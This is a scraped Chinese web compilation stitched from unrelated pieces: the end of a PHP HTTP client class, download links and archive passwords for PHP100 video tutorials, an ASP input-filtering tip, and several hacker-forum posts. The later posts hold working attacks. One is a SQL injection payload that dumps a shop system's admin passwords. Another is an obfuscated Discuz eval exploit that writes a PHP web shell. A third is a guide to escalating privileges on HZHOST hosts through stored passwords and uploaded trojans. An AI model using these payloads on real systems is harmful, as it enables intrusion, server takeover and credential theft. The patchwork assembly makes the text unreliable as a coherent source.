* @param integer code 1(enabled) 0(disabled)
* @example $this->allowredirection(0)
* @example $this->allowredirection(1)
*
*/
function allowredirection($code)
{
if($code=='0')
$this->allowredirection=FALSE;
elseif($code=='1')
$this->allowredirection=TRUE;
}
/**
* This function is called if
* allowredirection() is enabled.
* You don't have to call it.
*
* @access private
* @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
* @return string $this->get($this->last_redirection)
* @return string $this->recv;
*
*/
function getredirection()
{
if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
{
$this->last_redirection = trim($codearr[2]);
if(!ereg('://',$this->last_redirection))
return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
else
return $this->get($this->last_redirection);
}
else
return $this->recv;
}
/**
* This function allows you
* to reset some parameters.
*
* @access public
* @param string func Param
* @example $this->reset('header')
* @example $this->reset('cookie')
* @example $this->reset()
*
*/
function reset($func='')
{
switch($func)
{
case 'header':
$this->header = array('');
break;
case 'cookie':
$this->cookie = array('');
break;
default:
$this->cookiejar = '';
$this->header = array('');
$this->cookie = array('');
$this->allowredirection = '';
break;
}
}
}
?>
php100视频教程下载(全集含解压密码)更新至97
原始地址列表整理:
http://wt6.php100.com/php100-1.rar
http://wt6.php100.com/php100-2.rar
http://wt6.php100.com/php100-3.rar
http://wt6.php100.com/php100-4.rar
http://wt6.php100.com/php100-5.rar
http://wt6.php100.com/php100-6.rar
http://wt6.php100.com/php100-7.rar
http://wt6.php100.com/php100-8.rar
http://wt6.php100.com/php100-9.rar
http://wt6.php100.com/php100-10.rar
http://wt6.php100.com/php100-11.rar
http://wt6.php100.com/php100-12.rar
http://wt6.php100.com/php100-13.rar
http://wt6.php100.com/php100-14.rar
http://wt6.php100.com/php100-15.rar
http://wt6.php100.com/php100-16.rar
http://wt6.php100.com/php100-17.rar
http://wt6.php100.com/php100-18.rar
http://wt6.php100.com/php100-19.rar
http://wt6.php100.com/php100-20.rar
http://wt6.php100.com/php100-21.rar
http://wt6.php100.com/php100-22.rar
http://wt6.php100.com/php100-23.rar
http://wt6.php100.com/php100-24.rar
http://wt6.php100.com/php100-25.rar
http://wt6.php100.com/php100-26.rar
http://wt6.php100.com/php100-27.rar
http://wt6.php100.com/php100-28.rar
http://wt6.php100.com/php100-29.rar
http://wt6.php100.com/php100-30.rar
http://wt6.php100.com/php100-31.rar
http://wt6.php100.com/php100-32.rar
http://wt6.php100.com/php100-33.rar
http://wt6.php100.com/php100-34.rar
http://wt6.php100.com/php100-35.rar
http://wt6.php100.com/php100-36.rar
http://wt6.php100.com/php100-37.rar
http://wt6.php100.com/php100-38.rar
http://wt6.php100.com/php100-39.rar
http://wt6.php100.com/php100-40_c.rar
http://wt6.php100.com/09/php100-41_u.rar
http://wt6.php100.com/09/php100-42_m.rar
http://wt6.php100.com/09/php100-43.rar
http://wt6.php100.com/09/php100-44.rar
http://wt6.php100.com/09/php100-45.rar
http://wt6.php100.com/09/php100-46.rar
http://wt6.php100.com/09/php100-47_s.rar
http://wt6.php100.com/09/php100-48_i.rar
http://wt6.php100.com/09/php100-49_s.rar
http://wt6.php100.com/09/php100-50_e.rar
http://wt6.php100.com/09/php100-51_m.rar
http://wt6.php100.com/09/php100-52_h.rar
http://wt6.php100.com/09/php100-53_o.rar
http://wt6.php100.com//09/php100-54_.rar
http://wt6.php100.com/09/php100-55_j.rar
http://wt6.php100.com/09/php100-56_n.rar
http://wt6.php100.com/09/php100-57_s.rar
http://wt6.php100.com/09/php100-58_d.rar
http://wt6.php100.com/09/php100-59_a.rar
http://wt6.php100.com/09/php100-60.rar
http://wt6.php100.com//09/php100-61_!.rar
http://wt6.php100.com//09/php100-62_u.rar
http://wt6.php100.com/09/php100-63-1_x.rar
http://wt6.php100.com/09/php100-64.rar
http://wt6.php100.com/09/php100-65_ss.rar
http://wt6.php100.com/09/php100-66_p.rar
http://wt6.php100.com/09/php100-67_o.rar
http://wt6.php100.com/09/php100-68_m.rar
http://wt6.php100.com/09/php100-69_d.rar
http://wt6.php100.com//10/php100-70.rar
http://wt6.php100.com//10/php100-71_s.rar
http://wt6.php100.com/10/php100-72_x.rar
http://wt6.php100.com/10/php100-73_h.rar
http://wt6.php100.com/10/php100-74_z.rar
http://wt6.php100.com/10/php100-75-vip.rar 解压密码:php100-18293-2938-2839-348-#
http://wt6.php100.com/10/php100-76_u.rar 解压密码:php100-18634-6254-1001-283-#
http://wt6.php100.com/10/php100-77_p.zip 解压密码:php100-18394-9384-2333-314-#
http://wt6.php100.com//10/php100-78.zip 解压密码:php100-28323-5837-2734-392-#
http://wt6.php100.com/10/php100-79_u.zip 解压密码:php100-83343-5234-8849-122-#
http://wt6.php100.com/10/php100-80_s.zip 解压密码:php100-18622-5751-1311-233-#
http://wt6.php100.com/10/php100-81.zip 应该是忘记设密码了
http://wt6.php100.com/10/php100-82.rar 解压密码:php100-18028-4321-1202-942-#
http://wt6.php100.com/10/php1000-83.rar 解压密码:php100-18942-3321-1232-010-#
http://wt6.php100.com/10/php10000-84.rar 解压密码:php100-18823-3333-1322-842-#
http://wt6.php100.com/10/php100-85.rar 解压密码:php100-00000-0000-0000-000-#
http://down3.php100.com:81/php100/10/php100-86.rar 解压密码:php100-18837-3847-7576-624-#
http://down3.php100.com:81/php100/10/php100-87.rar 解压密码:php100-19746-3293-2273-929-#
http://down3.php100.com:81/php100/10/88.rar 解压密码: php100-17374-3828-4877-183-#
第89讲以后解压密码都为php100.com
http://down3.php100.com:81/php100/10/php100-89.rar
http://down3.php100.com:81/php100/10/php100-90.rar
http://down3.php100.com:81/php100/10/php100-91.rar
http://down3.php100.com:81/php100/10/php100-92.rar
http://down3.php100.com:81/php100/10/php100-93.rar
http://dx.php100.com:83/10/php100-94.rar
http://dx.php100.com:83/10/php100-95-.rar
http://dx.php100.com:190/10/php100-96.rar
http://dx.php100.com:190/10/php100-97.rar
PHP100视频教程1:环境配置与代码调试
PHP100视频教程2:PHP的数据类型与源码调试
PHP100视频教程3:常用PHP运算类型介绍与应用
PHP100视频教程4: PHP条件语句介绍与应用
PHP100视频教程5:PHP循环语句的介绍与应用
PHP100视频教程6:PHP数组的创建修改应用
PHP100视频教程7:PHP函数和自定义函数
PHP100视频教程8:Mysql 简介和创建新的数据库
PHP100视频教程9:数据库中的常用SQL语句
PHP100视频教程10:MYSQL在PHP5中的应用
PHP100视频教程11:学习制作PHP+MYSQL留言板(上)
PHP100视频教程12:学习制作PHP+MYSQL留言板(下)
PHP100视频教程13:PHP+MYSQL分页原理
PHP100视频教程14:PHP上传原理及应用
PHP100视频教程15:PHP生成HTML文件原理
PHP100视频教程16:PHP小偷程序原理和实例
PHP100视频教程17:PHP面向对象开发的学习(一)
PHP100视频教程18:PHP面向对象开发的学习(二)
PHP100视频教程19:PHP面向对象开发的学习(三)
PHP100视频教程20:PHP面向对象开发的学习(四)
PHP100视频教程21:PHP面向对象开发的学习(五)
PHP100视频教程22:PHP面向对象开发的学习(六)
PHP100视频教程23:PHP面向对象开发的学习(七)
PHP100视频教程24:PHP面向对象开发的学习(八)
PHP100视频教程25:PHP面向对象开发的学习(九)
PHP100视频教程26:制作自己的PHP+MYSQL的类
PHP100视频教程27:PHP模板引擎Smarty入门使用
PHP100视频教程28:PHP模板引擎Smarty的变量操作符
PHP100视频教程29:PHP模板引擎Smarty内置函数
PHP100视频教程30:PHP模板引擎Smarty缓存应用
PHP100视频教程31:PHP在线编辑器fckeditor应用
PHP100视频教程32:PHP5中Cookie与 Session详解
PHP100视频教程33:PHP5中图片验证码的制作(上)
PHP100视频教程34:PHP5中图片中文验证码(下)
PHP100视频教程35:PHP5文字图片混合水印与缩略图
PHP100视频教程36:PHP中正则表达式学习及应用(一)
PHP100视频教程37:PHP中正则表达式学习及应用(二)
PHP100视频教程38:PHP中正则表达式学习及应用(三)
PHP100视频教程39:PHP中正则表达式学习及应用(四)
PHP100视频教程40:PHP中开发自己的-UBB代码
PHP100视频教程41:PHP站内搜索、多关键字、加亮显示
PHP100视频教程42:PHP通过mail()或Socket发邮件
PHP100视频教程43:PHP中MVC学习之ThinkPHP(上)
PHP100视频教程44:PHP中MVC学习之ThinkPHP(下)
PHP100视频教程45:如何用PHP开发一个完整的网站
PHP100视频教程46:PHPMyAdmin功能操作详解
PHP100视频教程47:PHP输出CSV和EXCEL两种简单的方法
PHP100视频教程48:Ajax+PHP快速上手及应用
PHP100视频教程49: Ajax+PHP打造等待进度条效果(二)
PHP100视频教程50: Ajax+PHP检查用户名或邮件(三)
PHP100视频教程51:PHP+MYSQL会员系统的开发(上)
PHP100视频教程52:PHP+MYSQL会员系统的开发(下)
PHP100视频教程53:PHP如何防止注入及开发安全
PHP100视频教程54:Apache Rewrite 拟静态配置
PHP100视频教程55:PHP5中使用PDO连接数据库
PHP100视频教程56:制作PHP安装程序的原理和步骤
PHP100视频教程57:PHP备份数据库原理和方法
PHP100视频教程58:快速设计一个企业网站之BIWEB
PHP100视频教程59:关于BIWEB常见问题和结构分析
PHP100视频教程60:PHP与数据库代码开发规范
PHP100视频教程61:PHP+Mysql新闻系统的开发一
PHP100视频教程62:PHP+Mysql新闻系统的开发二
PHP100视频教程63:PHP+Mysql新闻系统的开发三(上)
PHP100视频教程64:PHP+Mysql新闻系统的开发四
PHP100视频教程65:PHP+Mysql新闻系统的开发五
PHP100视频教程66:PHP+Mysql新闻系统的开发六
PHP100视频教程67:PHP+Mysql新闻系统的开发七
PHP100视频教程68:PHP+Mysql新闻系统的开发八
PHP100视频教程69:PHP+Mysql新闻系统的开发九
PHP100视频教程70:PHP 5.3.1 + Apache + Mysql配置
PHP100视频教程71:PHP SQLite 的使用和配置
PHP100视频教程72:PHP+SQLite 常用函数及应用
PHP100视频教程73:PHP MemCached高级缓存配置
PHP100视频教程74:PHP MemCached 高级缓存应用
PHP100视频教程75:Zend framework 配置与调试
PHP100视频教程76:Zend framework 数据库操之读取与插入
PHP100视频教程77:Zend framework数据库操作之编辑和视图函数
PHP100视频教程78:PHP+Flash多文件异步上传 swfupload
PHP100视频教程79:PHP上传RAR压缩包并解压目录
PHP100视频教程80:ADODB PHP 数据库万能引擎类(上)
PHP100视频教程81:ADODB PHP 数据库万能引擎类(下)
PHP100视频教程82: PHP开发通用采集入库程序
PHP100视频教程83: PHP开发通用采集入库程序二
PHP100视频教程84:PHP开发通用采集入库程序三
PHP100视频教程85:PHP 图表类 JPGraph 入门配置与应用
PHP100视频教程86:PHP JPGraph 中文字体和背景设置
PHP100视频教程87:PHP 之 CURL 传输与获取功能
PHP100视频教程88:PHP 之 CURL模拟登陆并获取数据
PHP100视频教程89:PHP XML 的 DOMDocument 读取功能
PHP100视频教程90:PHP DOM 创建生成多功能 XML文件
PHP100视频教程91:PHP修改和删除XML内容的原理和方法
PHP100视频教程92:在线支付接口之PHP支付宝接口开发
PHP100视频教程93:在线支付接口之PHP云网接口开发
PHP100视频教程94:SVN (Subversion) 配置与安装调试
PHP100视频教程95:SVN (Subversion) 应用与技巧
PHP100视频教程96:PHP程序员经典面试&笔试题目解析(上)
PHP100视频教程97:PHP程序员经典面试&笔试题目解析(下)
感谢php100提供如此优秀的资源
感觉非常好的PHP资源、 分享
asp中对多余参数的完美过滤--IsNumeric
来源:闽南黑客基地 http://www.123yc.com(欢迎大家加入)
作者:FISH
今天给大家带来一个更加完美的过滤方式,就是用到微软的VBscript里面的一个isnumeric()函数!好了,
废话少说,先来看看他的描述与用法:
IsNumeric 函数 描述
返回 Boolean 值指明表达式的值是否为数字。
语法
IsNumeric(expression)
expression 参数可以是任意表达式。
说明
如果整个 expression 被识别为数字,IsNumeric 函数返回 True;
否则函数返回 False。
如果 expression 是日期表达式,IsNumeric 函数返回 False。
好了,看到这里大家明白了吗?
isnumeric()这个函数就是比较括号里的表达试,看是否为数字,如果为数字这返回true,如果非数字则返回false,基这个原理 ,那么我们就可以用
if not isnumeric(request.querystring("id")) then response.redirect "index.asp"
同样的道理,在then后面你也可以加上你想要的,如果加上别的别忘了加上一个
response.end
表示结束!
现在给大家解析以下,这句话的意思是:如果在IE地址栏上id后面的参数不是数字的话,那么实行then后面的语句!
大家看到了吧,这里就是管家的地方,所以我说是“完美过滤”!
比如大家平时检查时候有漏洞的时候一般就是在id后面加上一些特殊的符号来达到我们想要的目的!而着函数就是我们的天敌了!
只要你在id后面加上,比喻,(‘)或(;)或(,)或( and 1=1)...等等,
都使id已经变为了非数字,也就是使then后面的语句本实行了!
从而达到了我们的过滤目的!
====================================
对与一些纯数字的过滤最好莫过于用脚本语言的本身函数:
比如 asp 脚本可以用 cint,clong,isNumeric 这样的过滤可以说是最严格的一种了。PHP脚本里可以用intval 这样的函数。
对于不能过滤“<”和“>”情况下跨站的脚本的防范手段是,将所有的尖扩号都转化成对应的HTML编码。对于“<”表示成“<” 对与“>” 表示成“>” 需要特别注意的是对于上面所有的输入过滤都要在服务端进行,客户端的所有验证都会等于徒劳无用,可以很轻松的绕过。
商达讯网店系统淘宝拍拍分店版注射
作者:Lan3a
官网:http://www.sungoto.com/
程序我感觉是抄袭的。不过又说不出来,到底抄袭的哪个程序。
先随便看了下代码,发现到了每一个变量都用了
这个函数来检查。
看了下,才发现原来是这个作用。
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "<center>参数" & ParaName & "必须为数字型,请正确操作!</center>"
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function
这个时候凡是遇到有SafeRequest()的我都没去看了。
就这样我找到了vworder.asp这个文件,这个文件里的变量没有做任何检查就执行了查询。
goods=request.form("searchkey")
set rs=server.CreateObject("adodb.recordset")
rs.open "select id,name,price1,score,price2,vipprice,actiondate,UserSex,realname,receipt,goods,postcode,comments,comment,remarks,paymethord,deliverymethord,state,paid,priced,useremail,usertel,address,productnum from orders where goods='"&goods&"' ",conn,1,1
if rs.eof and rs.bof then
response.write "<center>查无此订单!</center>"
response.End
end if
%>
由于是post提交。所以我们来到searchorder.asp页面
在订单号里输入:
1' and 1=2 union select 1,2,3,4,5,6,userpassword,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22,23,24 from admin where ''='
然后会发现管理员的用户密码被爆了出来~官网测试如下:
最后我发现官网所有的程序都有这个漏洞,但需要更改查询的语句才能爆出密码。
Discuz非创始人管理员代码执行
global.func.php
function sendpm($toid, $subject, $message, $fromid = '') { |
if($fromid === '') { |
require_once DISCUZ_ROOT.'./uc_client/client.php'; |
$fromid = $discuz_uid; |
} |
if($fromid) { |
uc_pm_send($fromid, $toid, $subject, $message); |
} else { |
global $promptkeys; |
if(in_array($subject, $promptkeys)) { |
$type = $subject; |
} else { |
extract($GLOBALS, EXTR_SKIP); |
require_once DISCUZ_ROOT.'./include/discuzcode.func.php'; |
eval("\$message = addslashes(\"".$message."\");"); //无过滤,可插入代码 |
$type = 'systempm'; |
$message = '<div>'.$subject.' {time}'.discuzcode($message, 1, 0).'</div>'; |
} |
sendnotice($toid, $message, $type); |
} |
} |
POC:
1. admincp.php?frames=yes&action=members&operation=newsletter
2. 发短消息,通知内容为:{${phpinfo()}}
EXP - (fputs(fopen('forumdata/cache/cache_01.php','w'),'<?php eval($_POST[cmd])?>');) :
${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}
HZHOST虚拟主机在提权中的进一步利用
1。c:\windows\temp下有hzhost主机留下的ftp登陆记录。有用户名和密码
2。是利用hzhost拿系统主机最高权限的。
安装了hzhost的主机,其mssql sa密码,mysql root密码还有serv-u的administrator密码全部保存在注册表中。位置在
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpass
经过了hzhost自己的加密方式,象eLVClO4tzsKBf#dee52443a3872cc159
这样的字符串。不过在hzhost后台可以还原!拿到了sa密码,或者root密码,最高权限就在眼前!禁止了w.s的话。大家就传aspx木马导撒!
我们传了一个asp木马上去后。在incs\constr.asp下面可以看到数据库连接串。然后连接到数据库。通过执行
SELECT * FROM [hstlst]语句。可以看到很多主机记录
h_ftppass的密码和hzhost主机自己的加密串很相似。没错,主机管理的密码也是经过他自己的加密方式加了密!而我们在主机管理的地方
看到明文密码。说明他又给还原回来了。明白了么?我们先通过aspx木马导出mysql,mssql的root,sa密码加密串后
我们通过这条语句,修改别人的主机密码。
UPDATE [hstlst] SET h_ftppss=’aPWw3j4zMaK83lHMBof9fc298b1d3d0a’ WHERE h_ID=10000471
然后回过头去看主机密码。(这时候被转成了明文)
拿到了root密码为:sphil_070921注意:由于有多种限制。我截的图可能不是很完美。但是此方法绝对可行!
